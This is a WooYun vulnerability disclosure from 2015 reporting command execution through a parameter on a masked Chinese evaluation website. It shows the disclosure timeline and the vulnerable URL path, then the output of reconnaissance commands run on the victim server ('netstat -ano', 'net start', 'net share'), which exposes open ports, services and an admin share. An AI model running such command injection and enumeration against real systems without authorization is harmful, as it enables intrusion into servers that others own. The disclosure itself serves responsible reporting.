乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-28: 厂商已经确认,细节仅向厂商公开 2015-07-08: 细节向核心白帽子及相关领域专家公开 2015-07-18: 细节向普通白帽子公开 2015-07-28: 细节向实习白帽子公开 2015-08-12: 细节向公众公开
地址
1.http://**.**.**/evaluation/evaluation/toScoreList.actionidentityNumber=
存在命令执行漏洞
netstat -ano
活动连接 协议 本地地址 外部地址 状态 PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1240 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1776 TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 38712 TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 38712 TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 1172 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 404 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 772 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 824 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 500 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 448 TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 1816 TCP 127.0.0.1:3306 127.0.0.1:51294 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51295 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51314 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51315 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51344 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51345 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51346 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51347 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51348 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51349 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51350 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51351 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51352 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51353 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51354 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51355 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51356 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51357 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51358 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51359 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51384 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51429 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51475 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51476 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51485 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51506 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51507 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51508 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51509 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51526 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51527 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51540 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51541 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51554 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51567 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51568 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51569 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51570 ESTABLISHED 1240 TCP 127.0.0.1:3306 127.0.0.1:51571 ESTABLISHED 1240 TCP 127.0.0.1:3306
net start
已经启动以下 Windows 服务: Apache2.2 Application Experience Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service DNS Client Group Policy Client Human Interface Device Access IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent MySQL55 Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Time Windows Update Workstation 主动防御命令成功完成。
net share
共享名 资源 注解-------------------------------------------------------------------------------C$ C:\
开终端远程,不是太好吧?
加强安全意识
危害等级:中
漏洞Rank:8
确认时间:2015-06-28 07:19
CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.
暂无